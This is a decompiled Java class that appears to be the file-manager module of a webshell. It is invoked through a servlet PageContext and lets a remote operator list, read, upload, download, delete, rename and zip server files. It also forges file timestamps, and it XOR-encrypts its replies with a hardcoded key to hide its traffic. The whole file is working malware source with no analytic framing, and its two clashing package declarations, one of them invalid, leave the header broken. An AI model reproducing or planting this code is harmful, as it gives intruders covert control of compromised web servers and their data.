package org.iir.ptdhqg.vpryrlp;

package ..deTemp.1735803694629;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
import java.nio.charset.Charset;
import java.nio.file.LinkOption;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.Set;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

public class Zexgqwy {
  public static String mode;
  
  public static String path;
  
  public static String newPath;
  
  public static String content;
  
  public static String charset;
  
  public static String hash;
  
  public static String blockIndex;
  
  public static String blockSize;
  
  public static String createTimeStamp;
  
  public static String modifyTimeStamp;
  
  public static String accessTimeStamp;
  
  private Object Request;
  
  private Object Response;
  
  private Object Session;
  
  private Charset osCharset = Charset.forName(System.getProperty("sun.jnu.encoding"));
  
  public boolean equals(Object obj) {
    Map<String, String> result = new HashMap<String, String>();
    try {
      fillContext(obj);
      if (mode.equalsIgnoreCase("list")) {
        result.put("msg", list());
        result.put("status", "success");
      } else if (mode.equalsIgnoreCase("show")) {
        result.put("msg", show());
        result.put("status", "success");
      } else if (mode.equalsIgnoreCase("checkExist")) {
        result.put("msg", checkExist(path));
        result.put("status", "success");
      } else if (mode.equalsIgnoreCase("delete")) {
        result = delete();
      } else if (mode.equalsIgnoreCase("create")) {
        result.put("msg", create());
        result.put("status", "success");
      } else if (mode.equalsIgnoreCase("append")) {
        result.put("msg", append());
        result.put("status", "success");
      } else if (mode.equalsIgnoreCase("update")) {
        updateFile();
        result.put("msg", "ok");
        result.put("status", "success");
      } else if (mode.equalsIgnoreCase("downloadPart")) {
        result.put("msg", downloadPart(path, Long.parseLong(blockIndex), Long.parseLong(blockSize)));
        result.put("status", "success");
      } else {
        if (mode.equalsIgnoreCase("download")) {
          download();
          return true;
        } 
        if (mode.equalsIgnoreCase("rename")) {
          result = renameFile();
        } else if (mode.equalsIgnoreCase("createFile")) {
          result.put("msg", createFile());
          result.put("status", "success");
        } else if (mode.equalsIgnoreCase("compress")) {
          zipFile(path, true);
          result.put("msg", "ok");
          result.put("status", "success");
        } else if (mode.equalsIgnoreCase("createDirectory")) {
          result.put("msg", createDirectory());
          result.put("status", "success");
        } else if (mode.equalsIgnoreCase("getTimeStamp")) {
          result.put("msg", getTimeStamp());
          result.put("status", "success");
        } else if (mode.equalsIgnoreCase("updateTimeStamp")) {
          result.put("msg", updateTimeStamp());
          result.put("status", "success");
        } else if (mode.equalsIgnoreCase("check")) {
          result.put("msg", checkFileHash(path));
          result.put("status", "success");
        } 
      } 
    } catch (Throwable e) {
      e.printStackTrace();
      result.put("msg", e.getMessage());
      result.put("status", "fail");
    } finally {
      try {
        Object so = this.Response.getClass().getMethod("getOutputStream", new Class[0]).invoke(this.Response, new Object[0]);
        Method write = so.getClass().getMethod("write", new Class[] { byte[].class });
        write.invoke(so, new Object[] { Encrypt(buildJson(result, true).getBytes("UTF-8")) });
        so.getClass().getMethod("flush", new Class[0]).invoke(so, new Object[0]);
        so.getClass().getMethod("close", new Class[0]).invoke(so, new Object[0]);
      } catch (Exception e) {
        e.printStackTrace();
      } 
    } 
    return true;
  }
  
  private String checkFileHash(String path) throws Exception {
    FileChannel ch = (FileChannel)sessionGetAttribute(this.Session, path);
    if (ch != null && ch.isOpen())
      ch.close(); 
    byte[] input = getFileData(path);
    if (input == null || input.length == 0)
      return null; 
    MessageDigest md5 = MessageDigest.getInstance("MD5");
    md5.update(input);
    byte[] byteArray = md5.digest();
    StringBuilder sb = new StringBuilder();
    for (byte b : byteArray) {
      sb.append(String.format("%02x", new Object[] { Byte.valueOf(b) }));
    } 
    return sb.substring(0, 16);
  }
  
  private void updateFile() throws Exception {
    FileChannel ch = (FileChannel)sessionGetAttribute(this.Session, path);
    if (ch == null) {
      FileOutputStream fos = new FileOutputStream(path);
      ch = fos.getChannel();
      sessionSetAttribute(this.Session, "fos", fos);
      sessionSetAttribute(this.Session, path, ch);
    } 
    synchronized (ch) {
      ch.position((Integer.parseInt(blockIndex) * Integer.parseInt(blockSize)));
      ch.write(ByteBuffer.wrap(base64decode(content)));
    } 
  }
  
  private Map<String, String> warpFileObj(File file) {
    Map<String, String> obj = new HashMap<String, String>();
    obj.put("type", file.isDirectory() ? "directory" : "file");
    obj.put("name", file.getName());
    obj.put("size", file.length() + "");
    obj.put("perm", getFilePerm(file));
    obj.put("lastModified", (new SimpleDateFormat("yyyy/MM/dd HH:mm:ss")).format(new Date(file.lastModified())));
    return obj;
  }
  
  private boolean isOldJava() {
    String version = System.getProperty("java.version");
    if (version.compareTo("1.7") >= 0)
      return false; 
    return true;
  }
  
  private String checkExist(String path) throws Exception {
    File file = new File(path);
    if (file.exists())
      return file.length() + ""; 
    throw new Exception("");
  }
  
  private String getFilePerm(File file) {
    String permStr = "";
    if (isWindows()) {
      try {
        permStr = (file.canRead() ? "R" : "-") + "/" + (file.canWrite() ? "W" : "-") + "/" + (file.canExecute() ? "E" : "-");
      } catch (Error error) {
        permStr = (file.canRead() ? "R" : "-") + "/" + (file.canWrite() ? "W" : "-") + "/-";
      } 
    } else {
      String version = System.getProperty("java.version");
      if (version.compareTo("1.7") >= 0) {
        try {
          getClass();
          Class<?> FilesCls = Class.forName("java.nio.file.Files");
          getClass();
          Class<?> PosixFileAttributesCls = Class.forName("java.nio.file.attribute.PosixFileAttributes");
          getClass();
          Class<?> PathsCls = Class.forName("java.nio.file.Paths");
          getClass();
          Class<?> PosixFilePermissionsCls = Class.forName("java.nio.file.attribute.PosixFilePermissions");
          Object f = PathsCls.getMethod("get", new Class[] { String.class, String[].class }).invoke(PathsCls.getClass(), new Object[] { file.getAbsolutePath(), new String[0] });
          Object attrs = FilesCls.getMethod("readAttributes", new Class[] { Path.class, Class.class, LinkOption[].class }).invoke(FilesCls, new Object[] { f, PosixFileAttributesCls, new LinkOption[0] });
          Object result = PosixFilePermissionsCls.getMethod("toString", new Class[] { Set.class }).invoke(PosixFilePermissionsCls, new Object[] { PosixFileAttributesCls.getMethod("permissions", new Class[0]).invoke(attrs, new Object[0]) });
          permStr = result.toString();
        } catch (Exception exception) {}
      } else {
        permStr = (file.canRead() ? "R" : "-") + "/" + (file.canWrite() ? "W" : "-") + "/" + (file.canExecute() ? "E" : "-");
      } 
    } 
    return permStr;
  }
  
  private String list() throws Exception {
    String result = "";
    File f = new File(path);
    List<Map<String, String>> objArr = new ArrayList<Map<String, String>>();
    objArr.add(warpFileObj(new File(".")));
    objArr.add(warpFileObj(new File("..")));
    if (f.isDirectory() && f.listFiles() != null)
      for (File temp : f.listFiles())
        objArr.add(warpFileObj(temp));  
    result = buildJsonArray(objArr, true);
    return result;
  }
  
  private String show() throws Exception {
    byte[] fileContent = getFileData(path);
    return base64encode(fileContent);
  }
  
  private byte[] getFileData(String path) throws IOException {
    ByteArrayOutputStream output = new ByteArrayOutputStream();
    FileInputStream fis = new FileInputStream(new File(path));
    int data;
    while ((data = fis.read()) != -1)
      output.write(data); 
    fis.close();
    return output.toByteArray();
  }
  
  private String create() throws Exception {
    String result = "";
    FileOutputStream fso = new FileOutputStream(path);
    fso.write(base64decode(content));
    fso.flush();
    fso.close();
    result = path + "上传完成，远程文件大小:" + (new File(path)).length();
    return result;
  }
  
  private Map<String, String> renameFile() throws Exception {
    Map<String, String> result = new HashMap<String, String>();
    File oldFile = new File(path);
    File newFile = new File(newPath);
    if (oldFile.exists() && (oldFile.isFile() & oldFile.renameTo(newFile)) != 0) {
      result.put("status", "success");
      result.put("msg", "重命名完成:" + newPath);
    } else {
      result.put("status", "fail");
      result.put("msg", "重命名失败:" + newPath);
    } 
    return result;
  }
  
  private String createFile() throws Exception {
    String result = "";
    FileOutputStream fso = new FileOutputStream(path);
    fso.close();
    result = path + "创建完成";
    return result;
  }
  
  private String createDirectory() throws Exception {
    String result = "";
    File dir = new File(path);
    dir.mkdirs();
    result = path + "创建完成";
    return result;
  }
  
  private void download() throws Exception {
    FileInputStream fis = new FileInputStream(path);
    Object so = this.Response.getClass().getMethod("getOutputStream", new Class[0]).invoke(this.Response, new Object[0]);
    Method write = so.getClass().getMethod("write", new Class[] { byte[].class });
    int data;
    while ((data = fis.read()) != -1) {
      write.invoke(so, new Object[] { Integer.valueOf(data) });
    } 
    so.getClass().getMethod("flush", new Class[0]).invoke(so, new Object[0]);
    so.getClass().getMethod("close", new Class[0]).invoke(so, new Object[0]);
    fis.close();
  }
  
  private String append() throws Exception {
    String result = "";
    FileOutputStream fso = new FileOutputStream(path, true);
    fso.write(base64decode(content));
    fso.flush();
    fso.close();
    result = path + "追加完成，远程文件大小:" + (new File(path)).length();
    return result;
  }
  
  private Map<String, String> delete() throws Exception {
    Map<String, String> result = new HashMap<String, String>();
    File f = new File(path);
    if (f.exists()) {
      if (f.delete()) {
        result.put("status", "success");
        result.put("msg", path + " 删除成功.");
      } else {
        result.put("status", "fail");
        result.put("msg", "文件" + path + "存在，但是删除失败.");
      } 
    } else {
      result.put("status", "fail");
      result.put("msg", "文件不存在.");
    } 
    return result;
  }
  
  private String getTimeStamp() throws Exception {
    String result = "";
    DateFormat df = new SimpleDateFormat("yyyy/MM/dd HH:mm:ss");
    File f = new File(path);
    Map<String, String> timeStampObj = new HashMap<String, String>();
    if (f.exists()) {
      getClass();
      Class<?> FilesCls = Class.forName("java.nio.file.Files");
      getClass();
      Class<?> BasicFileAttributesCls = Class.forName("java.nio.file.attribute.BasicFileAttributes");
      getClass();
      Class<?> PathsCls = Class.forName("java.nio.file.Paths");
      Object file = PathsCls.getMethod("get", new Class[] { String.class, String[].class }).invoke(PathsCls.getClass(), new Object[] { path, new String[0] });
      Object attrs = FilesCls.getMethod("readAttributes", new Class[] { Path.class, Class.class, LinkOption[].class }).invoke(FilesCls, new Object[] { file, BasicFileAttributesCls, new LinkOption[0] });
      Class<?> FileTimeCls = Class.forName("java.nio.file.attribute.FileTime");
      Object createTime = FileTimeCls.getMethod("toMillis", new Class[0]).invoke(BasicFileAttributesCls.getMethod("creationTime", new Class[0]).invoke(attrs, new Object[0]), new Object[0]);
      Object lastAccessTime = FileTimeCls.getMethod("toMillis", new Class[0]).invoke(BasicFileAttributesCls.getMethod("lastAccessTime", new Class[0]).invoke(attrs, new Object[0]), new Object[0]);
      Object lastModifiedTime = FileTimeCls.getMethod("toMillis", new Class[0]).invoke(BasicFileAttributesCls.getMethod("lastModifiedTime", new Class[0]).invoke(attrs, new Object[0]), new Object[0]);
      String createTimeStamp = df.format(new Date(((Long)createTime).longValue()));
      String lastAccessTimeStamp = df.format(new Date(((Long)lastAccessTime).longValue()));
      String lastModifiedTimeStamp = df.format(new Date(((Long)lastModifiedTime).longValue()));
      timeStampObj.put("createTime", createTimeStamp);
      timeStampObj.put("lastAccessTime", lastAccessTimeStamp);
      timeStampObj.put("lastModifiedTime", lastModifiedTimeStamp);
      result = buildJson(timeStampObj, true);
    } else {
      throw new Exception("文件不存在");
    } 
    return result;
  }
  
  private boolean isWindows() {
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0)
      return true; 
    return false;
  }
  
  private String updateTimeStamp() throws Exception {
    String result = "";
    DateFormat df = new SimpleDateFormat("yyyy/MM/dd HH:mm:ss");
    File f = new File(path);
    if (f.exists()) {
      f.setLastModified(df.parse(modifyTimeStamp).getTime());
      if (!isOldJava()) {
        Class<?> PathsCls = Class.forName("java.nio.file.Paths");
        Class<?> BasicFileAttributeViewCls = Class.forName("java.nio.file.attribute.BasicFileAttributeView");
        Class<?> FileTimeCls = Class.forName("java.nio.file.attribute.FileTime");
        Method getFileAttributeView = Class.forName("java.nio.file.Files").getMethod("getFileAttributeView", new Class[] { Path.class, Class.class, LinkOption[].class });
        Object attributes = getFileAttributeView.invoke(Class.forName("java.nio.file.Files"), new Object[] { PathsCls.getMethod("get", new Class[] { String.class, String[].class }).invoke(PathsCls.getClass(), new Object[] { path, new String[0] }), BasicFileAttributeViewCls, new LinkOption[0] });
        Object createTime = FileTimeCls.getMethod("fromMillis", new Class[] { long.class }).invoke(FileTimeCls, new Object[] { Long.valueOf(df.parse(createTimeStamp).getTime()) });
        Object accessTime = FileTimeCls.getMethod("fromMillis", new Class[] { long.class }).invoke(FileTimeCls, new Object[] { Long.valueOf(df.parse(accessTimeStamp).getTime()) });
        Object modifyTime = FileTimeCls.getMethod("fromMillis", new Class[] { long.class }).invoke(FileTimeCls, new Object[] { Long.valueOf(df.parse(modifyTimeStamp).getTime()) });
        BasicFileAttributeViewCls.getMethod("setTimes", new Class[] { FileTimeCls, FileTimeCls, FileTimeCls }).invoke(attributes, new Object[] { modifyTime, accessTime, createTime });
      } 
      result = "时间戳修改成功。";
    } else {
      throw new Exception("文件不存在");
    } 
    return result;
  }
  
  private String downloadPart(String path, long blockIndex, long blockSize) throws Exception {
    int size;
    FileChannel ch = (FileChannel)sessionGetAttribute(this.Session, path);
    if (ch == null) {
      FileInputStream fis = new FileInputStream(path);
      ch = fis.getChannel();
      sessionSetAttribute(this.Session, "fis", fis);
      sessionSetAttribute(this.Session, path, ch);
    } 
    ByteBuffer buffer = ByteBuffer.allocate((int)blockSize);
    synchronized (ch) {
      ch.position(blockIndex * blockSize);
      size = ch.read(buffer);
    } 
    byte[] content = new byte[size];
    System.arraycopy(buffer.array(), 0, content, 0, size);
    return base64encode(content);
  }
  
  private static void zipFile(String srcDir, boolean KeepDirStructure) throws Exception {
    File file = new File(srcDir);
    String fileName = file.getName();
    FileOutputStream out = new FileOutputStream((new File(srcDir)).getParentFile().getAbsolutePath() + File.separator + fileName + ".zip");
    long start = System.currentTimeMillis();
    ZipOutputStream zos = null;
    try {
      zos = new ZipOutputStream(out);
      File sourceFile = new File(srcDir);
      compress(sourceFile, zos, sourceFile.getName(), KeepDirStructure);
      long l = System.currentTimeMillis();
    } catch (Exception e) {
      throw new RuntimeException("zip error from ZipUtils", e);
    } finally {
      if (zos != null)
        try {
          zos.close();
        } catch (IOException e) {
          e.printStackTrace();
        }  
    } 
  }
  
  private static void compress(File sourceFile, ZipOutputStream zos, String name, boolean KeepDirStructure) throws Exception {
    byte[] buf = new byte[102400];
    if (sourceFile.isFile()) {
      zos.putNextEntry(new ZipEntry(name));
      FileInputStream in = new FileInputStream(sourceFile);
      int len;
      while ((len = in.read(buf)) != -1)
        zos.write(buf, 0, len); 
      zos.closeEntry();
      in.close();
    } else {
      File[] listFiles = sourceFile.listFiles();
      if (listFiles == null || listFiles.length == 0) {
        if (KeepDirStructure) {
          zos.putNextEntry(new ZipEntry(name + "/"));
          zos.closeEntry();
        } 
      } else {
        for (File file : listFiles) {
          if (KeepDirStructure) {
            compress(file, zos, name + "/" + file.getName(), KeepDirStructure);
          } else {
            compress(file, zos, file.getName(), KeepDirStructure);
          } 
        } 
      } 
    } 
  }
  
  private String buildJsonArray(List<Map<String, String>> list, boolean encode) throws Exception {
    StringBuilder sb = new StringBuilder();
    sb.append("[");
    for (Map<String, String> entity : list)
      sb.append(buildJson(entity, encode) + ","); 
    if (sb.toString().endsWith(","))
      sb.setLength(sb.length() - 1); 
    sb.append("]");
    return sb.toString();
  }
  
  private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
    StringBuilder sb = new StringBuilder();
    String version = System.getProperty("java.version");
    sb.append("{");
    for (String key : entity.keySet()) {
      sb.append("\"" + key + "\":\"");
      String value = ((String)entity.get(key)).toString();
      if (encode)
        if (version.compareTo("1.9") >= 0) {
          getClass();
          Class<?> Base64 = Class.forName("java.util.Base64");
          Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
          value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { value.getBytes("UTF-8") });
        } else {
          getClass();
          Class<?> Base64 = Class.forName("sun.misc.BASE64Encoder");
          Object Encoder = Base64.newInstance();
          value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { value.getBytes("UTF-8") });
          value = value.replace("\n", "").replace("\r", "");
        }  
      sb.append(value);
      sb.append("\",");
    } 
    if (sb.toString().endsWith(","))
      sb.setLength(sb.length() - 1); 
    sb.append("}");
    return sb.toString();
  }
  
  private byte[] base64decode(String base64Text) throws Exception {
    byte[] result;
    String version = System.getProperty("java.version");
    if (version.compareTo("1.9") >= 0) {
      getClass();
      Class<?> Base64 = Class.forName("java.util.Base64");
      Object Decoder = Base64.getMethod("getDecoder", null).invoke(Base64, null);
      result = (byte[])Decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(Decoder, new Object[] { base64Text });
    } else {
      getClass();
      Class<?> Base64 = Class.forName("sun.misc.BASE64Decoder");
      Object Decoder = Base64.newInstance();
      result = (byte[])Decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(Decoder, new Object[] { base64Text });
    } 
    return result;
  }
  
  private static String base64encode(String content) throws Exception {
    String result = "";
    String version = System.getProperty("java.version");
    if (version.compareTo("1.9") >= 0) {
      Class<?> Base64 = Class.forName("java.util.Base64");
      Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
      result = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { content.getBytes("UTF-8") });
    } else {
      Class<?> Base64 = Class.forName("sun.misc.BASE64Encoder");
      Object Encoder = Base64.newInstance();
      result = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { content.getBytes("UTF-8") });
      result = result.replace("\n", "").replace("\r", "");
    } 
    return result;
  }
  
  private static String base64encode(byte[] content) throws Exception {
    String result = "";
    String version = System.getProperty("java.version");
    if (version.compareTo("1.9") >= 0) {
      Class<?> Base64 = Class.forName("java.util.Base64");
      Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
      result = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { content });
    } else {
      Class<?> Base64 = Class.forName("sun.misc.BASE64Encoder");
      Object Encoder = Base64.newInstance();
      result = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { content });
      result = result.replace("\n", "").replace("\r", "");
    } 
    return result;
  }
  
  private void fillContext(Object obj) throws Exception {
    if (obj.getClass().getName().indexOf("PageContext") >= 0) {
      this.Request = obj.getClass().getMethod("getRequest", new Class[0]).invoke(obj, new Object[0]);
      this.Response = obj.getClass().getMethod("getResponse", new Class[0]).invoke(obj, new Object[0]);
      this.Session = obj.getClass().getMethod("getSession", new Class[0]).invoke(obj, new Object[0]);
    } else {
      Map<String, Object> objMap = (Map<String, Object>)obj;
      this.Session = objMap.get("session");
      this.Response = objMap.get("response");
      this.Request = objMap.get("request");
    } 
    this.Response.getClass().getMethod("setCharacterEncoding", new Class[] { String.class }).invoke(this.Response, new Object[] { "UTF-8" });
  }
  
  private byte[] getMagic() throws Exception {
    String key = this.Session.getClass().getMethod("getAttribute", new Class[] { String.class }).invoke(this.Session, new Object[] { "u" }).toString();
    int magicNum = Integer.parseInt(key.substring(0, 2), 16) % 16;
    Random random = new Random();
    byte[] buf = new byte[magicNum];
    for (int i = 0; i < buf.length; i++)
      buf[i] = (byte)random.nextInt(256); 
    return buf;
  }
  
  private Object sessionGetAttribute(Object session, String key) {
    Object result = null;
    try {
      result = session.getClass().getMethod("getAttribute", new Class[] { String.class }).invoke(session, new Object[] { key });
    } catch (Exception exception) {}
    return result;
  }
  
  private void sessionSetAttribute(Object session, String key, Object value) {
    try {
      session.getClass().getMethod("setAttribute", new Class[] { String.class, Object.class }).invoke(session, new Object[] { key, value });
    } catch (Exception exception) {}
  }
  
  private byte[] Encrypt(byte[] paramArrayOfbyte) throws Exception {
    byte[] arrayOfByte;
    String str = "e45e329feb5d925b";
    for (byte b = 0; b < paramArrayOfbyte.length; b++)
      paramArrayOfbyte[b] = (byte)(paramArrayOfbyte[b] ^ str.getBytes()[b + 1 & 0xF]); 
    try {
      Class<?> clazz = Class.forName("java.util.Base64");
      Object object = clazz.getMethod("getEncoder", null).invoke(clazz, null);
      arrayOfByte = (byte[])object.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(object, new Object[] { paramArrayOfbyte });
    } catch (Throwable throwable) {
      Class<?> clazz = Class.forName("sun.misc.BASE64Encoder");
      Object object = clazz.newInstance();
      String str1 = (String)object.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(object, new Object[] { paramArrayOfbyte });
      str1 = str1.replace("\n", "").replace("\r", "");
      arrayOfByte = str1.getBytes();
    } 
    return arrayOfByte;
  }
}
